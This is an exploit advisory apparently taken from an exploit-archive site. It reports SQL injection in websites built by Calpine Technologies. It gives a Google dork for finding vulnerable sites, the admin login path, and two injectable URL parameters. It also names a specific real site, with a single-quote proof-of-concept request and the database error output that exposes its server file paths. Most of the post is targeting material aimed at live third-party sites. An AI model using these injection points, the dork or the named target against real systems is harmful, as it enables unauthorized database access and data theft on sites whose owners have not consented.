facebook facebook twitter rss

Powered By Calpine Technologies SQL Injection Vulnerability

Author: KingSkrupellos , Published: 18-10-2018
# Exploit Title : Powered By Calpine Technologies SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 20/10/2018
# Vendor Homepage : calpinetech.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork : intext:''WebSite Design Powered By Calpine Technologies''
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Admin Panel Login Path :

/tickets/admin/

# SQL Injection Exploit :

/job-search-title.php?reid=[SQL Injection]

/company_vacancy.php?cid=[SQL Injection]

#################################################################################################

# Example Vulnerable Site =>

infopark.in/job-search-title.php?reid=8263%27 => [ Proof of Concept ] => archive.is/S6i6U

# SQL Database Error =>

You have an error in your SQL syntax; check the manual that corresponds to your

MySQL server version for the right syntax to use near ''4''' at line 1

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in

/home/infopark/public_html/job-search-title.php on line 7

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in

/home/infopark/public_html/job-search-title.php on line 48

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :